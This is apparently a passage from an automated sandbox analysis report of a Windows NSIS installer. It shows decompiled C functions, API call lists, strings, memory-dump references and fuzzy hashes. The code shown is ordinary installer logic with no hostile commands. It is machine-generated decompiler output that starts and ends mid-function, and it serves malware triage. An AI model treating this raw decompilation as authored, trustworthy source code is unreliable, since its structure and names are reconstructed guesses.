										_t53 = SHGetSpecialFolderLocation( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18),  &_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											L27:
											 *_t86 =  *_t86 & 0x00000000;
											__eflags =  *_t86;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t86);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t53;
										if(_t53 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t55 =  *_t51( *0x42ec28,  *(_t98 + _t97 * 4 - 0x18), 0, 0, _t86);
									__eflags = _t55;
									if(_t55 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t86, 0x400);
							goto L29;
						} else {
							_t72 = (_t69 & 0x0000003f) +  *0x42ec58;
							E00405AAE(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t69 & 0x0000003f) +  *0x42ec58, _t86, _t69 & 0x00000040);
							__eflags =  *_t86;
							if( *_t86 != 0) {
								L30:
								__eflags = _v16 - 0x1a;
								if(_v16 == 0x1a) {
									lstrcatA(_t86, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E00405BE9(_t72, _t86, _t97, _t86, _v16);
							L29:
							__eflags =  *_t86;
							if( *_t86 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t50 - 0x5a04;
					if(_t50 == 0x5a04) {
						goto L12;
					}
					__eflags = _v16 - 0x23;
					if(_v16 == 0x23) {
						goto L12;
					}
					__eflags = _v16 - 0x2e;
					if(_v16 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t86 =  *_t86 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E00405BC7(_a4, _t37);
			}




























              0x00405be9
              0x00405be9
              0x00405be9
              0x00405bef
              0x00405bf4
              0x00405c05
              0x00405c05
              0x00405c10
              0x00405c12
              0x00405c17
              0x00405c1a
              0x00405c1b
              0x00405c22
              0x00405c24
              0x00405c2a
              0x00405c2d
              0x00405c2d
              0x00405e06
              0x00405e06
              0x00405e0a
              0x00000000
              0x00000000
              0x00405c3a
              0x00405c40
              0x00000000
              0x00000000
              0x00405c46
              0x00405c47
              0x00405c4a
              0x00405c4d
              0x00405df9
              0x00405e03
              0x00405e05
              0x00405e05
              0x00405dfb
              0x00405dfd
              0x00405dff
              0x00405e00
              0x00405e00
              0x00000000
              0x00405df9
              0x00405c53
              0x00405c57
              0x00405c67
              0x00405c6b
              0x00405c72
              0x00405c75
              0x00405c79
              0x00405c7f
              0x00405c82
              0x00405c85
              0x00405c88
              0x00405da3
              0x00405da6
              0x00405dd6
              0x00405dd9
              0x00405dde
              0x00405de2
              0x00405de2
              0x00405de7
              0x00405de8
              0x00405ded
              0x00405df0
              0x00405df2
              0x00000000
              0x00405df2
              0x00405da8
              0x00405dab
              0x00405dc0
              0x00405dc7
              0x00405dad
              0x00405db4
              0x00405db4
              0x00405dcf
              0x00405dd2
              0x00405d9b
              0x00405d9c
              0x00405d9c
              0x00000000
              0x00405dd2
              0x00405c90
              0x00405c91
              0x00405c97
              0x00405c99
              0x00405cb3
              0x00405cb3
              0x00405cba
              0x00405cba
              0x00405cc1
              0x00405cc5
              0x00405cc5
              0x00405cc6
              0x00405cc8
              0x00405d01
              0x00405d04
              0x00405d14
              0x00405d17
              0x00405d1f
              0x00405d25
              0x00405d25
              0x00405d81
              0x00405d81
              0x00405d83
              0x00000000
              0x00000000
              0x00405d29
              0x00405d30
              0x00405d31
              0x00405d33
              0x00405d4d
              0x00405d5b
              0x00405d61
              0x00405d63
              0x00405d7e
              0x00405d7e
              0x00405d7e
              0x00000000
              0x00405d7e
              0x00405d69
              0x00405d74
              0x00405d7a
              0x00405d7c
              0x00000000
              0x00000000
              0x00000000
              0x00405d7c
              0x00405d35
              0x00405d38
              0x00000000
              0x00000000
              0x00405d47
              0x00405d49
              0x00405d4b
              0x00000000
              0x00000000
              0x00000000
              0x00405d4b
              0x00000000
              0x00405d81
              0x00405d0c
              0x00000000
              0x00405cca
              0x00405ccf
              0x00405ce5
              0x00405cea
              0x00405ced
              0x00405d8a
              0x00405d8a
              0x00405d8e
              0x00405d96
              0x00405d96
              0x00000000
              0x00405d8e
              0x00405cf7
              0x00405d85
              0x00405d85
              0x00405d88
              0x00000000
              0x00000000
              0x00000000
              0x00405d88
              0x00405cc8
              0x00405c9b
              0x00405c9f
              0x00000000
              0x00000000
              0x00405ca1
              0x00405ca5
              0x00000000
              0x00000000
              0x00405ca7
              0x00405cab
              0x00000000
              0x00405cad
              0x00405cad
              0x00000000
              0x00405cad
              0x00405cab
              0x00405e10
              0x00405e1a
              0x00405e26
              0x00405e26
              0x00000000

              APIs
              • GetVersion.KERNEL32(?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405C91
              • GetSystemDirectoryA.KERNEL32(0042DBC0,00000400), ref: 00405D0C
              • GetWindowsDirectoryA.KERNEL32(0042DBC0,00000400), ref: 00405D1F
              • SHGetSpecialFolderLocation.SHELL32(?,?), ref: 00405D5B
              • SHGetPathFromIDListA.SHELL32(?,0042DBC0), ref: 00405D69
              • CoTaskMemFree.OLE32(?), ref: 00405D74
              • lstrcatA.KERNEL32(0042DBC0,\Microsoft\Internet Explorer\Quick Launch), ref: 00405D96
              • lstrlenA.KERNEL32(0042DBC0,?,00429878,00000000,00404EEB,00429878,00000000), ref: 00405DE8
              Strings
              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 00405D90
              • Software\Microsoft\Windows\CurrentVersion, xrefs: 00405CDB
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
              • API String ID: 900638850-730719616
              • Opcode ID: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
              • Instruction ID: 131396e9090e0f007f21196dc47e10b2e1a614011cd8a075e276219472c4ac8b
              • Opcode Fuzzy Hash: dad9380ef75d4ee6d1e7f44bcb98c3f3aee458906992b83e7d16e4410c3c70ab
              • Instruction Fuzzy Hash: EA510531A04A04ABEB215B65DC88BBF3BA4DF05714F10823BE911B62D1D73C59429E5E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402C55, Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON
              Download Yara Rule
              C-Code - Quality: 77%
              			E00402C55(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t50;
				intOrPtr* _t59;
				long _t70;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				void* _t85;
				void* _t89;
				long _t90;
				long _t93;
				intOrPtr* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				 *0x42ec2c = GetTickCount() + 0x3e8;
				GetModuleFileNameA(0, 0x435c00, 0x400);
				_t89 = E0040589E(0x435c00, 0x80000000, 3);
				_v16 = _t89;
				 *0x409014 = _t89;
				if(_t89 == 0xffffffff) {
					return "Error launching installer";
				}
				E00405BC7(0x434c00, 0x435c00);
				E00405BC7(0x436000, E00405701(0x434c00));
				_t50 = GetFileSize(_t89, 0);
				 *0x428c50 = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402BF1(1);
					if( *0x42ec34 == _t82) {
						goto L29;
					}
					if(_v8 == _t82) {
						L28:
						_t94 = GlobalAlloc(0x40, _v24);
						E004030E2( *0x42ec34 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff);
						if(E00402E8E() == _v24) {
							 *0x42ec30 = _t94;
							 *0x42ec38 =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x42ec3c =  *0x42ec3c + 1;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
							} while (_t85 != 0);
							 *((intOrPtr*)(_t94 + 0x3c)) = SetFilePointer(_v16, _t82, _t82, 1);
							E0040585F(0x42ec40, _t94 + 4, 0x40);
							return 0;
						}
						goto L29;
					}
					E004030E2( *0x414c40);
					if(E004030B0( &_a4, 4) == 0 || _v12 != _a4) {
						goto L29;
					} else {
						goto L28;
					}
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x42ec34) & 0x00007e00) + 0x200;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						if(E004030B0(0x420c50, _t90) == 0) {
							E00402BF1(1);
							L29:
							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						if( *0x42ec34 != 0) {
							if((_a4 & 0x00000002) == 0) {
								E00402BF1(0);
							}
							goto L20;
						}
						E0040585F( &_v44, 0x420c50, 0x1c);
						_t77 = _v44;
						if((_t77 & 0xfffffff0) == 0 && _v40 == 0xdeadbeef && _v28 == 0x74736e49 && _v32 == 0x74666f73 && _v36 == 0x6c6c754e) {
							_a4 = _a4 | _t77;
							 *0x42ecc0 =  *0x42ecc0 | _a4 & 0x00000002;
							_t80 = _v20;
							 *0x42ec34 =  *0x414c40;
							if(_t80 > _t93) {
								goto L29;
							}
							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
								_v8 = _v8 + 1;
								_t93 = _t80 - 4;
								if(_t90 > _t93) {
									_t90 = _t93;
								}
								goto L20;
							} else {
								break;
							}
						}
						L20:
						if(_t93 <  *0x428c50) {
							_v12 = E00405FC6(_v12, 0x420c50, _t90);
						}
						 *0x414c40 =  *0x414c40 + _t90;
						_t93 = _t93 - _t90;
					} while (_t93 > 0);
					_t82 = 0;
					goto L24;
				}
			}
























              0x00402c5d
              0x00402c60
              0x00402c63
              0x00402c7d
              0x00402c82
              0x00402c95
              0x00402c9a
              0x00402c9d
              0x00402ca3
              0x00000000
              0x00402ca5
              0x00402cb6
              0x00402cc7
              0x00402cce
              0x00402cd6
              0x00402cdb
              0x00402cdd
              0x00402dca
              0x00402dcc
              0x00402dd8
              0x00000000
              0x00000000
              0x00402ddd
              0x00402e01
              0x00402e0c
              0x00402e17
              0x00402e1c
              0x00402e1f
              0x00402e20
              0x00402e21
              0x00402e2b
              0x00402e42
              0x00402e4a
              0x00402e4f
              0x00402e51
              0x00402e51
              0x00402e59
              0x00402e59
              0x00402e5c
              0x00402e5d
              0x00402e5d
              0x00402e60
              0x00402e62
              0x00402e62
              0x00402e72
              0x00402e80
              0x00000000
              0x00402e85
              0x00000000
              0x00402e2b
              0x00402de5
              0x00402df7
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00402ce3
              0x00402ce8
              0x00402ced
              0x00402cf1
              0x00402cf8
              0x00402cff
              0x00402d01
              0x00402d01
              0x00402d0c
              0x00402e36
              0x00402e2d
              0x00000000
              0x00402e2d
              0x00402d19
              0x00402d99
              0x00402d9d
              0x00402da2
              0x00000000
              0x00402d99
              0x00402d22
              0x00402d27
              0x00402d2f
              0x00402d55
              0x00402d64
              0x00402d6a
              0x00402d6f
              0x00402d75
              0x00000000
              0x00000000
              0x00402d7f
              0x00402d87
              0x00402d8a
              0x00402d8f
              0x00402d91
              0x00402d91
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00402d7f
              0x00402da3
              0x00402da9
              0x00402db5
              0x00402db5
              0x00402db8
              0x00402dbe
              0x00402dc0
              0x00402dc8
              0x00000000
              0x00402dc8

              APIs
              • GetTickCount.KERNEL32(00435400,?,00000000), ref: 00402C66
              • GetModuleFileNameA.KERNEL32(00000000,00435C00,00000400), ref: 00402C82
                • Part of subcall function 0040589E: GetFileAttributesA.KERNEL32(00000003,00402C95,00435C00,80000000,00000003), ref: 004058A2
                • Part of subcall function 0040589E: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 004058C4
              • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,00434C00,00434C00,00435C00,00435C00,80000000,00000003), ref: 00402CCE
              Strings
              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E2D
              • Error launching installer, xrefs: 00402CA5
              • Null, xrefs: 00402D4C
              • Inst, xrefs: 00402D3A
              • soft, xrefs: 00402D43
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: File$AttributesCountCreateModuleNameSizeTick
              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
              • API String ID: 4283519449-1074636621
              • Opcode ID: aa3f9cec0a553ea999bd6714df17e66e600ffe4cfe58bd24a942f15de3713587
              • Instruction ID: 196f3fd9364ed88bbd27218647615838fe3130e8ea263fbe41a0cbd6df82c613
              • Opcode Fuzzy Hash: aa3f9cec0a553ea999bd6714df17e66e600ffe4cfe58bd24a942f15de3713587
              • Instruction Fuzzy Hash: 6A510871941218ABDB609F66DE89B9E7BB8EF00314F10403BF904B62D1CBBC9D418B9D
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00402E8E, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 174fileCOMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E00402E8E(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418c48;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					E004030E2( *0x42ec78 + _t65);
				}
				if(E004030B0( &_a16, 4) == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E004030B0(0x414c48, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414c48, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E004030B0(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b5ac =  *0x40b5ac & 0x00000000;
					 *0x40b5a8 =  *0x40b5a8 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b090 = 8;
					 *0x414c38 = 0x40cc30;
					 *0x414c34 = 0x40cc30;
					 *0x414c30 = 0x414c30;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E004030B0(0x414c48, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b080 = 0x414c48;
						 *0x40b084 = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b088 = _t100;
							 *0x40b08c = _v12;
							_t79 = E00406034(0x40b080);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t106 =  *0x40b088 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ecd4 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EB3(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 =  *0x40b088;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								if(WriteFile(_a8, _v16, _t106,  &_v24, 0) == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}






















              0x00402e96
              0x00402e9a
              0x00402e9d
              0x00402ea2
              0x00402ea4
              0x00402ea4
              0x00402eab
              0x00402eaf
              0x00402eb4
              0x00402eb6
              0x00402eb6
              0x00402ebd
              0x00402ec2
              0x00402ecd
              0x00402ecd
              0x00402edf
              0x0040305b
              0x0040305b
              0x00000000
              0x00402ee5
              0x00402ee9
              0x00403046
              0x0040309b
              0x00403060
              0x00403066
              0x00403068
              0x00403068
              0x00403079
              0x00000000
              0x0040307b
              0x0040308e
              0x00403040
              0x00403040
              0x0040305d
              0x0040305d
              0x00000000
              0x00403095
              0x00403095
              0x00403098
              0x00000000
              0x00403098
              0x0040308e
              0x00403079
              0x004030a6
              0x00000000
              0x004030a6
              0x0040304b
              0x0040304d
              0x0040304d
              0x00403059
              0x004030a3
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00403059
              0x00402ef5
              0x00402ef7
              0x00402efe
              0x00402f05
              0x00402f05
              0x00402f0c
              0x00402f14
              0x00402f1e
              0x00402f23
              0x00402f2b
              0x00402f35
              0x00402f38
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00402f3e
              0x00402f3e
              0x00402f3e
              0x00402f46
              0x00402f48
              0x00402f48
              0x00402f59
              0x00000000
              0x00000000
              0x00402f5f
              0x00402f62
              0x00402f68
              0x00402f6e
              0x00402f6e
              0x00402f79
              0x00402f7f
              0x00402f84
              0x00402f8b
              0x00402f8e
              0x00000000
              0x00000000
              0x00402f9a
              0x00402f9c
              0x00402fa5
              0x00402fa7
              0x00402fd5
              0x00402fdb
              0x00402fe4
              0x00402fe9
              0x00402fe9
              0x00402ff0
              0x00403034
              0x00000000
              0x00000000
              0x00000000
              0x00402ff2
              0x00402ff5
              0x0040301c
              0x0040301f
              0x00403022
              0x00403025
              0x00403029
              0x00000000
              0x00000000
              0x00000000
              0x0040302f
              0x0040300b
              0x00000000
              0x00403012
              0x00403012
              0x00000000
              0x00403012
              0x0040300b
              0x00402ff0
              0x0040303c
              0x00000000
              0x0040303c
              0x00000000
              0x00402f3e

              APIs
              • GetTickCount.KERNEL32(000000FF,00000004,00000000,00000000,00000000), ref: 00402EF5
              • GetTickCount.KERNEL32(0040B080,00414C48,00004000), ref: 00402F9C
              • MulDiv.KERNEL32 ref: 00402FC5
              • wsprintfA.USER32 ref: 00402FD5
              • WriteFile.KERNEL32(00000000,00000000,?,7FFFFFFF,00000000), ref: 00403003
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CountTick$FileWritewsprintf
              • String ID: ... %d%%$HLA$HLA
              • API String ID: 4209647438-295942573
              • Opcode ID: 524ff0b34f7de7c8497ac67c33f70f76f9eeac22fa07b1060422ca7ed01ea917
              • Instruction ID: 15109c7e5c0d48913ae26536c30eb2ff4c12f072ab55fd5dd83b367320b2a29b
              • Opcode Fuzzy Hash: 524ff0b34f7de7c8497ac67c33f70f76f9eeac22fa07b1060422ca7ed01ea917
              • Instruction Fuzzy Hash: 2C618E71902219DBDB10DF65EA44AAF7BB8EB04356F10417BF910B72C4D7789A40CBE9
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00403EEA, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00403EEA(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








              0x00403efc
              0x00403f90
              0x00000000
              0x00403f90
              0x00403f0d
              0x00403f11
              0x00000000
              0x00000000
              0x00403f17
              0x00403f20
              0x00403f23
              0x00403f23
              0x00403f29
              0x00403f2f
              0x00403f2f
              0x00403f3b
              0x00403f41
              0x00403f48
              0x00403f4b
              0x00403f4e
              0x00403f50
              0x00403f50
              0x00403f58
              0x00403f5e
              0x00403f5e
              0x00403f68
              0x00403f6d
              0x00403f70
              0x00403f75
              0x00403f78
              0x00403f78
              0x00403f88
              0x00403f88
              0x00000000

              APIs
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
              • String ID:
              • API String ID: 2320649405-0
              • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
              • Instruction ID: d9f5f29c4b32eaf67df6904808fcf7c938901a1e5be6cbe83ca05de02e5bcf8c
              • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
              • Instruction Fuzzy Hash: A9215471904745ABC7219F78DD08B4BBFF8AF01715F04856AE856E22E0D734EA04CB55
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
              Download Yara Rule
              C-Code - Quality: 86%
              			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E00405727(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E0040587F(_t52);
				_t27 = E0040589E(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x42ec34;
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030E2(_t47);
						E004030B0(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E0040585F( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











              0x004026af
              0x004026b1
              0x004026bd
              0x004026c0
              0x004026ca
              0x004026ce
              0x004026ce
              0x004026d4
              0x004026e1
              0x004026e9
              0x004026ec
              0x004026f2
              0x00402700
              0x00402705
              0x00402709
              0x0040270c
              0x00402715
              0x00402721
              0x00402725
              0x00402728
              0x00402732
              0x00402751
              0x00402739
              0x0040273e
              0x00402746
              0x00402749
              0x0040274e
              0x0040274e
              0x00402758
              0x00402758
              0x0040276a
              0x00402771
              0x00402783
              0x00402783
              0x00402789
              0x00402789
              0x00402794
              0x00402795
              0x00402799
              0x0040279d
              0x004027a3
              0x004027a3
              0x004027aa
              0x00402197
              0x004028c1
              0x004028cd

              APIs
              • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
              • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
              • GlobalFree.KERNEL32(?), ref: 00402758
              • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040276A
              • GlobalFree.KERNEL32(00000000), ref: 00402771
              • CloseHandle.KERNEL32(?), ref: 00402789
              • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
              • String ID:
              • API String ID: 3294113728-0
              • Opcode ID: c8529e661290c7c84616a2a4682b07d72f06e259a4de3124d59d70fcaf5f5b24
              • Instruction ID: 7359f6b8c72d8bce8f96c3519292fde75c250a44c6e0f48ea69dd088617f1d2a
              • Opcode Fuzzy Hash: c8529e661290c7c84616a2a4682b07d72f06e259a4de3124d59d70fcaf5f5b24
              • Instruction Fuzzy Hash: 9D319C71C00028BBCF216FA5DE88DAEBA79EF04364F14423AF914762E0C67949018B99
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404EB3, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
              Download Yara Rule
              C-Code - Quality: 100%
              			E00404EB3(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x42e404;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x42ecd4;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BE9(0, _t39, 0x429878, 0x429878, _a4);
					}
					_t26 = lstrlenA(0x429878);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
